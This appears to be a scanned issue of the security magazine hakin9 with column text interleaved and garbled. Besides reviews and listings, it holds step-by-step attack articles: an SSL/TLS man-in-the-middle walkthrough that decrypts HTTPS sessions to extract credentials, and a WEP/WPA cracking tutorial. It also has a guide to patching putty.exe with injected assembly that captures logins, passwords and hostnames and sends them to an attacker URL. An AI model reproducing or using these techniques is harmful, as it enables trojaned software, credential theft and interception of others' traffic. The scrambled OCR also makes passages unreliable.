Professional Documents
Culture Documents
We Help You To Software LLC is looking for partners from all over the World. If you are
Choose the Best Anti-spyware 70 interested in cooperating with us,
please contact us by e-mail: cooperation@software.com.pl
Graham Hill, hakin9 team
Print: 101 Studio, Firma Tęgi
Consumers tests on Anti-spywares. Our goal is to Printed in Poland
help the readers make a right choice when choosing
and buying a program of this type. Distributed in the USA by: Source Interlink Fulfillment Division, 27500
Riverview Centre Boulevard, Suite 400, Bonita Springs, FL 34134
Tel: 239-949-4450.
– a Living Legend of IT Security 74 Whilst every effort has been made to ensure the high quality of the magazine, the
editors make no warranty, express or implied, concerning the results of content usage.
hakin9 team
All trade marks presented in the magazine were used only for informative purposes.
Interview with Eugene Kaspersky, a leading authority All rights to trade marks presented in the magazine are reserved by the companies
in IT Security solutions and business. which own them.
Self Exposure
To create graphs and diagrams we used program by
company.
Self Exposure CDs included to the magazine were tested with AntiVirenKit by G DATA
Software Sp. z o.o
by Dr. Gary McGraw 76
The editors use automatic DTP system
Monika Drygulska Mathematical formulas created by Design Science MathType™
Gary McGraw is CTO of Cigital and an author of
ATTENTION!
many IT Security publications. In this article he tells Selling current or past issues of this magazine for prices that are different than
hakin9 readers about his job, experiences and IT printed on the cover is – without permission of the publisher – harmful activity
and will result in judicial liability.
security.
hakin9 is also available in: Spain, Argentina, Portugal, France, Morocco,
Books Review 80 Belgium, Luxembourg, Canada, Germany, Austria, Switzerland, Poland,
Czech, Slovakia
Brandon Dixon, Jesus Oquendo
The hakin9 magazine is published in 7 language versions:
Upcoming 82 EN PL ES CZ
Monika Drygulska IT FR DE
Here we present topics that will be brought up in the
upcoming hakin9.
DISCLAIMER!
The techniques described in our articles may only be used in private,
local networks. The editors hold no responsibility for misuse of the
presented techniques or consequent data loss.
www.hakin9.org/en hakin9 Nr 2/2006 5
In brief
CD Contents
A
s every two months, hakin9 magazine includes Dr.Web Anti-virus + Anti-spam for Windows – an effi-
a free hakin9.live based on BackTrack2 CD. You cient and highly productive spam filtering solution based
will find plenty of useful hacking tools and plu- on Vade Retro technology by GOTO Software. It does
gins. BackTrack2 is the most top rated Linux live distribu- not require mail program plugins in order to function.
tion focused on penetration testing. Every packet, kernel This Dr Web's program uses various filtering techniques
configuration and scripts in BackTrack 2 are optimized for different types of unsolicited e-mails – such as spam,
to be used by security penetration testers. Patches and phishing, pharming, scamming – and bounce messages,
automatism have been added, applied or developed to this technique produces an exceptionally high detection
provide a neat and ready-to-go environment. rate. Before a verdict is made – spam\not spam – the
We updated the Metasploit frameworks. Our hakin9.live collective features of each message are studied. This is
contains special editions of most interesting commercial a 6 moths fully featured version.
applications negotiated exclusively for our readers. Retail price: 41$
To start using BackTrack2 hakin9.live simply boot www.drweb.com
your computer from the CD. To see the commercial ap-
plications and tutorials only, you do not need to reboot the DTweak by Daoisoft – a complex tweaker and optimiz-
PC – you will find the Applications and Tutorials folders ing tool especialy designed for Windows Vista. It pro-
simply exploring the CD. To configure the network, run vides such features as intelligent disk cleaner and safe
console and type: defragmenter plus smart hard drives monitor. DTweak
offers you a powerful arsenal of tools and tweaks to en-
ifconfig eth0 [your IP address] hance your computer's performance, responsiveness
and stability. It will also protect your privacy by cleaning
then type: computer and Internet tracks and help you customize
the look of Windows to your preferences and comput-
ip r a default via [your gateway address]. ing habits.
Retail price: $29.95
Finally, write: www.daoisoft.com
Enjoy surfing!
You will find the following programs on hakin9.live CD.
Apply them to improve your hacking and securing ac-
tions:
Figure 2. DTweak
The feature set of nVision includes network discovery, net- of a network, that does not matter. The other type of remote
work visualization through mapping, real-time monitoring of monitoring requires the installation of the nVision Agent. That
the network structure, individual host monitoring, interoper- gives nVision full control of the remote computer. Installing
ability, report generation and administration notifications. the agent is simple with the proper credentials, however with
a Windows computer, WMI has to be enabled (disabled by
Quick Start: The installation of nVision is simple and straight default in XP). This can be done with the WMIenable execut-
forward. It asks for credentials to use when installing. This able in the nVision installation directory. After the initial scan,
allows for remote installation of the nVision Agent (discussed a basic block diagram of all the hosts is presented. These
later) as well as some advanced features. After the install, hosts (or pictures representing them) can be moved around
the Axence nVision start up screen is displayed. The user and connected with lines representing physical or logical
has the choice of creating a new or opening an existing atlas links. After that, more detailed representation is available
(mapped network). If nVision was installed in Windows XP, consisting of a tabular listing of nodes, as well as names, IP
the application warns that with XP's SP2 only 10 outbound addresses, services offered, number of interfaces and sev-
connection attempts can be sent out at once. According to eral networking statistics. By selecting a single node, the user
Microsoft, this is to help preventing the spread of malicious is presented with a closer look of the targeted node. Two addi-
programs at the cost of scanning software working slower. tional items of note are User Activity and Inventory. With the
As a side note, the speed isn't affected if the connections are nVision Agent installed, User Activity is where screenshots,
succeeding. This has an affect on the nVision's speed, but is and user activity can be monitored. All the installed software
only noticeable during the interrogation of a particular host and hardware can be viewed on the Inventory tab. To unin-
and it causes slight pauses during a full network scan. On the stall the nVision Agent, the same method of installing must
other hand, during initial atlas list population, a ping sweep is be followed or the unins000.exe can be run from the Agent's
done with a few main ports also scanned. As an example, my installation directory.
ssh server was not discovered as available until I viewed the
host's properties in detail. nVision has two methods of remote Other Useful Features: The map layouts offer a helpful
monitoring: scanning and the nVision Agent. With scanning, logical view of the network (requires the user to layout the
all available services are listed, the scan is intrusive and loud, diagram, it is not automatically generated). With the nVision
but with the target user of this application being the owner Agent, user activity can be easily monitored as well as real-
time screen shots and network activity. Great for a large,
highly controlled enterprise. With the nVision Agent another
option is the remote access. This allows for remote control
of a host without the locking of the screen like Microsoft's
Remote Desktop. The notifications of newly added nodes
can be crucial.
Difficulty
T
here are a lot of ways to do that, depend- public keys, having the certificate and the
ing on the situation and the business encrypted traffic, we can easily decrypt the
critical factor of your data, the adopted whole traffic, allowing us to extract all sorts
solution always falls to the choice of SSL or of the information.
TLS encryption, especially if we do not know The question is how to do that ? If we ex-
a part of the communication path (the clients, clude the highly impossible or more difficult
assuming we are the server). methods of stealing the certificate, such as
hacking the server or social engineering, we
Secure Insecurity? are still left with one more method. We may
Although both Secure Socket Layer and not have the real certificate but we have our
Transport Layer Security (Elgamal, RSA, own certificate. We create a fake certificate,
Diffie-Hellman, DSA) are cryptographically as similar as possible to the original one, that
secure, as always, something exploitable ex- we will inject into the communication stream
ists. This is due to the difficulty encountered
by users in understanding the Public Key In-
frastructure and its layered organization. Ba- What you will learn...
sically, the end-user who wants to establish a
• Spoof DNS replies to redirect the traffic
secure connection to a server through SSL/
• Exploit the weakness of SSL/TLS
TLS must first accept and trust the digital cer- • Decrypt a theoretically secure HTTPS session
tificate that identifies the server. This ensures dump
that the server is exactly who it claims to be.
The end-user must trust the authenticity of
What you should know...
the certificate. Thus, if we inject a fake certifi-
cate into the communication stream and the • Arp-spoofing and sniffing techniques
user trusts that the certificate is good, then • MITM attacks
the game is over. Knowing the algorithms • The basics of PKI
used to encrypt the traffic and manage the
and that will hopefully be trusted by In both cases, the victim must or Snort in-development proc-
the victim. This kind of extremely trust our fake certificate and start essors to detect a suspicious
effective attack is named MITM the communication with the other ARP behavior. In fact, I have
(Man – or Monkey for some – In party without any suspicions, in never found a network mapped
The Middle) attack. such a manner that we can collect with static ARP entries, and ar-
all the encrypted traffic (encrypted pwatch is not used very often,
Attack Analysis with our certificate) so that it can be for a lot of reasons (mainly sim-
The ways to attack this weakness analyzed and decrypted later. plicity and lazy administrators).
are similar, they only differ depend- There are of course proprietary
ing on our position in regards to the Same Subnet Situation solutions from Cisco, but they
victim. Are we on the same subnet as are more expensive.
the victim? Or are we on a different • Assumptions – I will assume • Attack – I will go in-depth to show
subnet? The first case is the sim- that the switches do not have you the simplicity of sniffing en-
plest, the second one (if we cannot a static map of the ARP entries crypted SSL/TLS traffic between
reach the victim directly on our LAN) and that nobody is using passive hosts on the same network seg-
is more complex but not impossible. monitoring tools like arpwatch ment, using very popular Open-
Source tools.
������ �����������
���
������������
��������������
������
�����������
����
������������
��������������
������
Figure 1. Overview of OpenSSL cryptography library and SSL toolkit Figure 2. MITM on an SSL/TLS
channel
#webmitm -d
webmitm: relaying transparently
After the previous setup is attack is just watching the output of decrypt the SSL traffic knowing the
completed, we must sniff all the all the programs. After the trap is certificate used in the session (key)
plain/encrypted traffic with a com- prepared, it is just a matter of wait- and the protocol SSL (algorithm).
mon sniffer; tcpdump is enough for ing to collect all of the encrypted
our purposes for we do not need traffic. #ssldump -r output_wireshark
to view the connections in a real -k webmitm.crt -d > decryptedOutput
time. Phase 5:
Decrypting Sniffed Traffic Opening the output file with an
#tcpdump -i eth0 -w sniffed After the collection of the encrypted editor, we can see all the decrypted
tcpdump: listening on eth0, traffic we can stop our listening and sensitive data that was in transit
link-type EN10MB (Ethernet), sniffing programs and start the de- under SSL. The practical use of it is
capture size 96 bytes crypting activity. In order to do that grepping the useful information, like
we need: names of variables, in order to know
Now when the trap is prepared we their values.
just have to wait. • ssldump – a tool to analyze en- Imagine, we sniffed HTTPS traf-
crypted SSL traffic fic with authentication pages and
Phase 4: • The tcpdump traffic dump – it now we are searching for web form
HTTPS Session Sniffing contains all the traffic sniffed, in- user-names/passwords. To be able
We can recognize when the victim cluding the encrypted ones to grep the correct variable names,
starts an HTTPS session because • The certificate from webmitm that we must see the source code and
dnsspoof is mapping the queries we have generated, we can de- the layout of the web-page online.
and webmitm is injecting the certifi- crypt cypher text knowing the key Firefox is quite useful for this, espe-
cate. The most exciting part of this and the algorithm. We can also cially with extensions like Firebugs
that can help us to see the divs and
the frames. That will let us know the
name of the variables in which the
user/password will be stored.
I have mentioned the Firefox
plug-ins because sometimes it is
very difficult to grep the useful infor-
mation. We may think that the name
of the variable is one thing, but in
fact it is different. I have tried, for
example, my bank account website.
It is a really secure website, written
in JEE with jsp. I do not know why,
but the login page is a mixture of
multiple jsp frames and div, and I
Figure 4. Arpspoof and dnsspoof output during an attack (as you see, on my
was interested in the login one. I
local network)
have analyzed the code then, and
I got the names of the variables. I
need to make a grep on the ssldump
output file and I finally got the ex-
pected results.
Dawid Gołuński
Difficulty
I
n general, it is not very difficult to make wise, it is sometimes hard to figure out what
changes to an application when we have a given function does just by reading raw as-
access to its source code, especially when sembly code.
it is written in a high-level language like C or In this article I will guide you step-by-
C++. We can easily change its behaviour or step through the process of altering PuTTY,
add new features by simply adding or remov- a well-known SSH client, using only its bi-
ing a few instructions or functions. Just browse nary version. All we need is the executable
through the source code, add some lines, and file putty.exe of version 0.60 (you should use
recompile. That is all it takes to alter an open- exactly the same version due to the offsets
source application.
It is much more difficult to change an
application when all we have is a couple of What you will learn...
previously compiled binary files with – to
• How to modify an application without access to
make matters worse – unspecific purposes.
the source code
Dealing with binary files involves quite a bit
of research of low-level programming. That
is, examining pure assembly code with dif- What you should know...
ferent binary analysis tools like hex editors or • Have a basic knowledge of x86 assembly lan-
disassemblers. It requires reverse engineering guage and low-level programming
skills, knowledge of processor architecture as • Have a basic understanding of the PE format
well as the operating system under which an • Be familiar with binary analysis tools like Ol-
application has been designed to work, and, lyDbg, IDA, or Hiew
of course, assembly language. Someone once • Understand the basics of programming in a
said that analysing a binary file is like read- Windows environment and knowledge of its
ing a book where all the spaces between the API
words have been removed, making it hard to • PHP language
read the words and understand the plot. Like-
given in this article, which are very choose Set log breakpoint on every We can also assume that there must
likely to differ in other versions). Our command from the context menu. be a window message named WM _
goal will be to add an additional pro- A dialog box will appear where we KEYDOWN passed to the program, since
cedure to it, which will secretly steal can set some options concerning this is the message that the Windows
logins and passwords entered by our breakpoints. Make sure you tick operating system sends to an appli-
a user during the login process and Always beside the Log function ar- cation to inform it about a keypress.
send them over the Internet to some guments option, because it certainly Either way, we will find a group of calls
remote place of our own. might come in handy in our analysis connected with keyboard events, as
to see parameters passed to the shown in Listing 1.
Research functions apart from their names. The function that particularly
First off, we need to determine if the Once all the breakpoints have been stands out here is ToAsciiEx. Accord-
program has been compressed with set, we can run the program and go ing to MSDN, ToAsciiEx translates
any of the executable packers like to the Log window to watch what the specified virtual-key code and
UPX or Aspack. It would be fruitless happens. keyboard state to the correspond-
to make any changes to an applica- All sorts of functions will run ing character or characters. In
tion in a compressed state. We can through the window and the PuTTY's other words it returns ASCII codes
check if this is the case most easily configuration screen (in which we of pressed keys. If we could just in-
using one of the PE identifiers like can specify a host we want to con- tercept the output of this function, we
PEiD. nect to) will show up. But, before we would be able to collect the charac-
In this case, PEiD reveals the make an SSH connection by clicking ters of a user's login and password,
language in which PuTTY was writ- Open, we need to set our debugger one-by-one. And that is exactly what
ten. It does not, however, mention to log to a file everything that ap- we need.
any packer, so unpacking will not be pears in the window, so that we do
necessary. not lose anything. Obtaining a Hostname
After the connection, when a We have found a way of capturing
Examining login prompt from a remote system logins and passwords. But what
Login Process comes up, we type in a simple word about the hostname of a server to
We want to know exactly what login like FOOBAR as login. That should do which a user is connecting? After
and password a user typed in PuT- for now. It is better to close the log all, the login/password pairs would
TY's window to log in to a remote file immediately to prevent it from be completely useless without it. We
system over SSH. In order to capture needlessly getting any bigger. need to find a way to retrieve it.
this information we will have to find a Take a look at the produced log As you have probably noticed,
way of catching the keys pressed by file. Due to its size, it is hard to check PuTTY writes a hostname on the
a user while logging in. Therefore, we every function. But we can try to window's title bar. It should not be
will need to examine the login proc- search for the word we typed (FOOBAR) too hard to retrieve it from there.
ess closely and find out exactly how or the letters composing this word, Still, that would involve using an
PuTTY handles the keyboard when embracing them in quotes thus: 'F'. additional function, GetWindowTextA ,
an SSH session is established.
For this purpose, we will use Listing 1. API calls invoked by PuTTY to handle the keyboard
a popular debugger, OllyDbg. It gives
us the very useful feature of logging 0043F03E CALL to DispatchMessageA
pMsg = WM_KEYDOWN hw = 1D03E0 ("some-remote-host.com – PuTTY") Key = 46
breakpoints. We can set a logged
('F') KeyData = 210001
breakpoint on every API (Application 00441519 CALL to GetTickCount
Programming Interface) call invoked 00441533 CALL to QueryPerformanceCounter
by the program and thus easily learn pPerformanceCount = 0012CCEC
what functions are used and where 0043BD67 CALL to GetKeyboardLayout
ThreadID = 0
the key presses are themselves reg-
0043BD77 CALL to GetKeyboardState
istered. pState = 0012CBD4
After loading the executable file 0043BE0B CALL to SetKeyboardState
into the debugger, we right-click pKeyState = 0012CBD4
on the Code window and choose 0043C854 CALL to ToAsciiEx
Key = 46 ('F')
Search for->All intermodular calls
ScanCode = 21
from the context menu. It will give pKeyState = 0012CBD4
us the full list of the API calls used pTranslated = 0012CD00
by PuTTY in a separate window (the MenuActive = 0
References window). We then right- hKblayout = 04150415
which would consecutively require points. Then we set a breakpoint that the hostname we provided in
a handle of PuTTY's main window on every call to GetDlgItemTextA the edit box has been written in
(hwnd). A much better way to grab function and hit [CTRL+F2 ] to memory at an address of 0x46D680.
a hostname would be simply to copy restart the program. Next, we run That is the address we will use to
it from memory. PuTTY must hold it the program again, type in a host- retrieve a hostname entered by a
in there somewhere. Let us try to name, and close the configuration user later on.
trace this place from the start; that window to establish an SSH con-
is, from the PuTTY's start-up con- nection. We will end up at an ad- Getting Space for our Code
figuration window. dress of 0x435F67, which is where At this point we know where to
There is an edit box in which the first invocation of the traced obtain the necessary information.
we type a hostname. Win- function takes place. As you can But before we start writing our
dows programs commonly use see in Figure 3, four parameters PuTTY password sniffer, we must
GetDlgItemTextA function for retriev- are passed to this GetDlgItemTextA find some space in the putty.exe
ing text associated with a control in call, one of which is named Buffer. file in which we can put our code.
a dialog box. So we can try to trace It points to a place in memory We cannot simply add some bytes
calls to this function and see where where the retrieved value of the at a random offset increasing the
a hostname goes right after it is re- control is saved. If we follow this size of the file since a PE file is
trieved from the edit box. parameter (taking its value from a coherent structure of data, and
To do this, we first have to re- the stack) in a hex dump and step such operation would destroy it
move all of the previously set break- through the API call, we will notice (the offsets inside the file would
change and pointers would start
to point to wrong data). We could
try to write our code at the end of
putty.exe file (like viruses do), but it
would increase the size of the file,
and make it easier to detect.
A much better place in which to
situate our code would be unused
space between the sections of
the executable file. PE file head-
ers specify a file alignment value.
Each section inside a file starts at
an offset that is some multiple of
this value. It is very unlikely that all
of the sections inside the file end
exactly at the boundaries of these
Figure 1. PuTTY program analysed with PEiD
alignments.
Therefore, there is a very good
chance that we will find some free
space between the end of one sec-
tion and the start of another. We
will use Hiew hex editor to find out
if there is any unused space at the
end of the code section, and then
we can see if it is enough to stash
our code.
To view the PE header under
Hiew, we simply hit [F8 ]. It says that
the file alignment value is 0x1000.
That means each section begins
at a file offset that is a multiple of
0x1000. Next we go to the section
list by hitting [F6 ]. As you can see
in Figure 4, the list contains four
sections.
Let us take a look at the first
Figure 2. Tracing API calls during the login process with OllyDbg section, .text, which comprises
PuTTY's code. It starts at an off- IDA disassembler. We just need to API hooking
set of 0x1000. The next section is load the exe file, switch to the Hex As we have established, we want
.rdata, and it starts at an offset View mode, and jump to the end of to intercept data entered by a user
of 0x50000. Subtracting the first the section. by means of the ToAsciiEx function.
offset from the second, we get a The bytes that PuTTY refer- There is only one invocation of this
physical size of the .text section, ences are highlighted by IDA. As function that interests us, which is
which equals 0x4F000. There is we navigate through the section, placed in memory at an offset of
also another number that specifies we will notice many unused ar- 0x43C854 (according to Listing 1). We
a size – a virtual size – which is eas. One of them ranges from an must find a way that will allow us to
smaller and equals 0x4E4D1. This offset of 0x470B00 to 0x471050. That seize the output, so that we could
number determines the actual gives over 1 kB for our data. Good see exactly what keys are pressed,
space taken by PuTTY's code in enough for us. but that does not interrupt the pro-
memory, meaning that the rest of gram’s normal flow.
the space, starting from an offset Writing Code One way to achieve this is to
of 0x4F4D1 (0x4E4D1 + 0x1000) and Finally, once we have carried out our replace the call to the function with
continuing up to 0x50000 (the start research and collected all of the nec- a jump instruction that will pass the
of .rdata section), is absolutely essary information, we can move on control over PuTTY to our code.
unused. That gives us over 2.5 kB to modifying the executable file and In our code, we will invoke the
(2863 bytes exactly) of space for start writing our code. ToAsciiEx function ourselves and
our code:
get its output. We will also save all FF1520034500 call ToAsciiEx FF15E4034500 call [04503E4]
the registers after the invocation, so
that when our code finishes its job, Then we need to write: The last three instructions we must
we can return the control back to the write are:
original code, thus allowing PuTTY 60 pushad
to carry on with its normal flow. So 61 popad
let us put this into practice. This instruction will save all of the 685AC84300 push 00043C85A
We open putty.exe with Hiew, registers for PuTTY's future use. C3 ret
switch to the decode mode, and go We can write our own code at this
to a file offset of 0x3C854. There we point. They will recover the previously
find the call to ToAsciiEx, which ap- Let us display a simple message saved registers (popad) and pass
pears as follows: with the MessageBoxA function. First, the control back to PuTTY's code
we put its arguments onto the stack: (push + ret).
FF1520034500 call ToAsciiEx All that remains is to write some
6A00 push 000 string at a file offset of 0x4F4F8, and
We need to change this call to per- 6A00 push 000 hit [F9 ] to save the changes.
form a jump to our code. For this, we 68F8F44400 push 0044F4F8 From now on PuTTY should
can use the following combination of 6A00 push 000 display a message with the given
push and ret instructions: string (in case of the code visible
Here, 0x44F4F8 is a memory address in Figure 7, a HELLO!) each time a
68D1F44400 push 00044F4D1 that points to a string we want to dis- key is hit.
play. Now we can make a call to the
C3 ret MessageBoxA function (whose indirect Intercepting Data
address can be determined with Ol- If everything works fine we can
The address points to the free lyDbg by looking up other calls to proceed to writing more advanced
space in the .text section align- this function): code that will intercept data pro-
ment, because that is where our
code will be held. The ret instruc-
tion is supposed to work here as
an absolute jump. It simply jumps
to the address that is placed on the
top of the stack. It has an equiva-
lent effect to the following pair of
instructions:
A Simple Test
Now that we have made PuTTY
jump to the section alignment, we
can write a simple piece of code to
see if everything works properly.
Under Hiew, we go to a file
offset of 0x4F4D1, which is where
our space for code begins (it is
filled with null bytes at this point).
The first thing we need to do is to
restore the bytes of the call instruc-
tion we have overwritten: Figure 7. Writing a simple test code that shows a message
vided by a user − that is, a login, and its result (placed in the EAX an ASCII character is copied from
a password, and a hostname. register) is checked. The result the buffer (pointed to by EBP+C , as
Listing 2 shows an example of indicates if the passed key code you can see in Figure 6) into the
PuTTY password sniffer. Let us has been successfully translated string created _ string after the l=
quickly analyse its source to see to the ASCII code. If the result is prefix (which denotes login).
how it actually works. At first, 1 (meaning that one key has been The process repeats for each
the ToAsciiEx function is invoked, translated and placed in a buffer), key pressed by a user until [Back-
space] or [Enter] is hit. In that TASM will generate a puttysnf.com function, and then specify a path to
case, the result of ToAsciiEx is 0 file containing pure code without the puttysnf.com file.
(meaning that no key has been any headers, so it can be inserted After saving the changes, PuTTY
translated), which causes a jump directly into the putty.exe file, at an should present intercepted data as
to the special _ key label where a offset of 0x4F4D1. soon as a password is supplied, as
distinction between the two keys To insert a file with Hiew, we shown in Figure 8.
is made, and an appropriate action need to go to the desirable offset
is taken. The distinction is based (0x4F4D1), select a sufficiently large Sending Data to the Server
on a value of a byte stored at the block by pressing [* ] (twice, to mark We have managed to intercept data
address pointed to by EBP+8 (which both the start and the end of block), and show it on the screen. Our final
is a key code, passed as the first hit [CTRL-F2 ] to invoke the GetBlk goal, however, will be to send it over
argument to the ToAsciiEx func-
tion, as you can see in Figure 6). Listing 4. Function headers
If [Backspace] is pressed (the byte
equals 0x08), one character from HINTERNET InternetOpen(
__in LPCTSTR lpszAgent,
the string is removed.
__in DWORD dwAccessType,
If [Enter] (the byte equals 0x0D) __in LPCTSTR lpszProxyName,
is pressed, it means that a user __in LPCTSTR lpszProxyBypass,
has finished typing his login, so __in DWORD dwFlags
a prefix of &p = is appended to the );
?>
tasm /x puttysnf.asm
tlink /x /3 /t puttysnf.obj
the Internet, making the whole proc- case, of our putty.php) and the pa- because they are not used by
ess completely invisible to a user. rameter with intercepted data, and PuTTY. The first one contains
We will need a communication then open it with a http function. CryptBinaryToStringA function; the
channel to send the data. We could Simple as that. latter – functions required to make
send it by e-mail using the SMTP An example procedure that an HTTP request.
protocol, but it would take a lot of uses HTTP for passing information Next, CryptBinaryToStringA is
work and code to handle this type of is shown in Listing 3. It starts with a invoked to convert the intercepted
communication. loop copying the URL address (that data (stored in created _ string)
The easiest way would be to leads to a script that will receive to Base64 code. This will make
send it over HTTP, since the Win- stolen passwords) to the writeable our string not only look less sus-
dows API offers a ready-to-use set space in .data section, so that the picious in HTTP logs for casual
of functions designed to handle intercepted data can be appended readers, but it will also help to
HTTP requests. Therefore, we can to the address as a parameter avoid forbidden characters in the
easily pass all the data as a param- (data=). Then, the preparations for URL. At this point, the URL in
eter to some PHP script placed on requesting the URL begin. memory is prepared and looks
a remote server. This way we need Two additional dll libraries are like this: http://attacker-shell.com/
only create a URL that consist of an loaded: crypt32.dll and wininet.dll. putty.php?data=[base64_code].
address to the PHP script (in this We must load them ourselves The two functions InternetOpenA
and InternetOpenUrlA are then
invoked to initialize internal data
structures for a connection and re-
quest the URL (passing the Base64
encoded string to the putty.php
script), respectively. Note how the
returned value is checked after eve-
ry invocation of the GetProcAddress
function. This prevents PuTTY from
crashing if one of the functions
happens to be not available. Also
note that the CryptBinaryToStringA
function used for Base64 encoding,
though very convenient, makes the
code far less portable, since this
particular function is only available
on Windows XP and Vista systems.
Therefore, if portability is a serious
Figure 8. Modification of PuTTY that displays a message upon entering data concern, writing a custom Base64
encoding function should be con-
sidered.
The procedure needs to be
added to the source code of PuTTY
password sniffer (for example, at
the end, just above the line contain-
ing code ends). Before we close the
puttysnf.asm file, we must delete
the call to the MessageBoxA function
(along with the arguments pushed
onto the stack) and invoke the
send _ data procedure instead by
writing:
call send_data
Difficulty
W
EP stands for Wired Equivalent for Initialization Vector and is a 3 byte vector
Privacy or Wireless Encryption Pro- attached to each packet. This is used in au-
tocol and is used to secure 802.11 thentication of the client with the access point,
standard wireless networks. It was developed and contains the wireless key. So if we aim
to bring a certain level of confidentiality to wire-
less networks, as opposed to the openness of
wired networks. However, shortly later it was What you will learn...
discovered that WEP could be cracked in as
• What WEP/WPA are
little as a few minutes with the tools outlined
• How the Aircrack program works
later in this article (and those like it). WEP was • How to do a WEP Crack
officially recognised in September 1999 as a • How to do a WPA Dictionary Attack
standard of encryption. It uses RC4 stream • Advanced wireless cracking techniques such
ciphers (which is simple in design and use, as chopchop and Fragmentation attacks
but falls short of Cryptography standards for • How to use this information to configure the
confidentiality) for encryption, and uses the wireless card to access the network
checksum of CRC-32 to check for integrity of
the packets. There are two major key standards
that are used in WEP: What you should know...
• Basic knowledge of networks and wireless net-
• 64-bit WEP (40 bit key with a 24 bit Ini-
works is beneficial
tialisation Vector to form RC4 traffic size • Basic knowledge of the Linux operating system
standard) and Bash console is beneficial
• 128-bit WEP (104 bit key with a 24 bit IV) • This article will focus on the use of Aircrack
with the BackTrack Linux distro, so possession
The IV's are what are needed for cracking of a copy of this live CD would be beneficial. It
WEP, and these are captured with Airodump- is available at http://www.remote-exploit.org/
NG (documented later in the article). IV stands
to capture as many of these as we In Shared Key authentication, the businesses who cannot afford the
can, then the time needed to crack WEP key is used during the authen- cost of an 802.11 authentication
the WEP key is drastically reduced, tication. Something called a four way server. PSK keys consist of either
as we have already been given bits challenge-response handshake is 8 to 63 ASCII characters, or 64
and pieces of it from these IV's. used. This consists of: hexadecimal digits. Currently, the
For a 64-bit key crack, you need only way to crack PSK is to employ
about 250,000 IV's, and for a 128- • The client sends a request for a dictio-nary-based attack (docu-
bit key, you generally need around authentication to the AP. mented later in the article). Data
1,500,000 IV's. This can take any- • The AP sends back a challenge in WPA is also encrypted with the
time: from a few minutes to a few in clear-text. RC4 stream cipher (same as WEP),
hours to collect, however, the good • Tthe client then has to send this consisting of a 128-bit key and a
news is that Aircrack-NG (the crack- clear-text back encrypted with 48-bit IV. WPA prevents replay at-
ing program) can be run at the same the WEP key in a second authen- tacks via the use of MIC (Message
time as the capturing is in progress. tication request. Integrity Code) – a secure message
For WEP, there are two different • The AP decrypts then compares authentication code preventing the
methods of authentication: the received text with that it has alteration of a payloads integrity.
sent, and decides whether to as-
• Open System sociate with the client or not. So How Does
• Shared Key Aircrack Work?
Wi-Fi Protected Access (compris- Aircrack-ng is a program distributed
In Open System authentication, the cli- ing WPA and WPA2) was brought in the Aircrack program suite, and
ent does not need to provide any form in as the solution to WEP's security is the actual component of the suite
of credentials (the WEP key) to the vulnerabilities, and as of March 13 that cracks the pre-captured IV's (ex-
Access Point (AP) during authentica- 2006, it is the standard (WPA2) plained in depth later). Aircrack-ng is
tion and association (the connecting that all wireless devices need to able to crack WEP and WPA/WPA2
to the AP). However, once connected, include as an option in order to be PSK's.
the WEP keys are required to use the Wi-Fi Certified. WPA was created
AP. The Open System authentication by the Wi-Fi Alliance, a group that How does it crack WEP?
makes it easier and faster to capture owns the Wi-Fi trademark. WPA is Once enough packets have been
IV's using various injection methods, designed to distribute a different captured via the use of the Ai-
however, Shared Key authentica- key to every user, however, a more rodump program, Aircrack-ng is
tion can be cracked quicker in some vulnerable Pre-Shared Key (PSK) able to crack a WEP key using
cases, because the WEP key can be option is available, where every us- one of two methods. Airodump is
captured and decrypted from the four er has the same pass-phrase. This a program that sniffs all the wire-
way handshake. is practical for homes and small less traffic in the air around it, and
captures it to a file that you have
specified for use in cracking later.
The two methods that Aircrack-ng
can employ to crack are PTW (re-
quiring very few packets to obtain
the key, but is more restricted in
situations that it can be used in),
and the FMS/KoreK method, which
uses a mathematical procedure of
statistical origin combined with a
brute-force attack in order to crack
the key. A dictionary method is also
available for WEP, but this is mainly
used for WPA.
2006, moved on to his current posi- Mantin and Shamir (the pillars behind This method uses a combina-
tion at Pulsar Consulting – a Belgian the FMS/KoreK method employed by tion of statistical analysis and brute
business in Brussels, Belgium. Tho- Aircrack-ng). The PTW method uses force attacks. Overall, certain cap-
mas is a proficient coder in many the information discovered by Klein tured IV's effectively leak part of the
languages, including Java, C++, VB to employ it in a WEP key attack and WEP key for certain key bytes, and
.NET, PHP and Pascal (amongst is basically an enhanced version of when handling each byte of the key
others). the FMS/KoreK method. One of its individually, it is more likely that the
main downfalls is that it can only be correct IV is captured for each key
PTW Method used with ARP request and reply byte. When it is, the probability of
In 2005 a paper by Andreas Klein packets and not other traffic. a correct key goes up dramatically,
(available at http://cage.ugent.be/ up to as much as fifteen percent.
~klein/RC4/RC4-en.ps) detailed how FMS/KoreK Method When using the statistical method,
there were many more relations be- (More information available in the fol- a series of votes is collected for the
tween the RC4 stream cipher and the lowing paper – http://wiki-files.aircrack- probability that each of the keys
key than had been found by Fluhrer, ng.org/doc/using_FMS_attack.pdf) is one of those in the WEP key's
bytes. Each different attack has
a different probability of a particular
byte being correct because of dif-
ferent mathematical variabilities in
each method. These votes are col-
lected, and a small number of likely
keys is generated, which are then
tested with brute force to determine
which key is correct. In Aircrack-ng,
the particular byte leaked with its
amount of votes is displayed in the
format: byte(votes) for example A5
(145) as in Figure 1.
In effect, Aircrack uses maths
to find the probability of a key be-
ing correct and then a short brute
forcing session to determine if
this is so. Obviously, with more
data you are more likely to have
the correct key. However, if time
is not an issue and the key is not
Figure 2. The BackTrack Desktop found using standard values, then
another factor that can be changed
is something called the fudge fac-
tor. This, basically, tells Aircrack
how broadly to use brute-forcing.
For example, if say by default, Air-
crack searches between the values
of 0 and 2 for an initial fudge factor,
whereas if you modify the fudge
factor to a higher value (which
is an option in your attack), then
Aircrack would search between,
say, 0 and 5 or 0 and 10. This will
obviously take a lot longer, but it
is more likely to find a key if this
was difficult before. If you chose a
fudge factor of two, this would take
every value half as possible as the
most popular byte and above. Then
it would brute force them to check if
Figure 3. Iwconfig window they were correct. The amount that
you increase the fudge factor by for a lot of people out there who – and will usually display this within
is directly proportional to the time have used Linux live CD's before, a few seconds of pressing the on
and CPU power required to brute but not everyone has done so, and button) and change the boot order
force the key. as such, I will guide you in how to do so that the CD drive is before the
For dictionary attacks, the dic- it. First of all, you need to head over Hard Drive (detailed instructions
tionary must consist of ASCII or hex- to http://www.remote-exploit.org/ are available in your motherboard
adecimal keys, and not both at the backtrack_download.html and click manual), or some newer laptops and
same time. WPA is only cracked via on a link to download the ISO. For PC's will have option select a boot
the use of dictionary attacks and the those of you who have never seen device on startup (E.g. Press [F10 ]
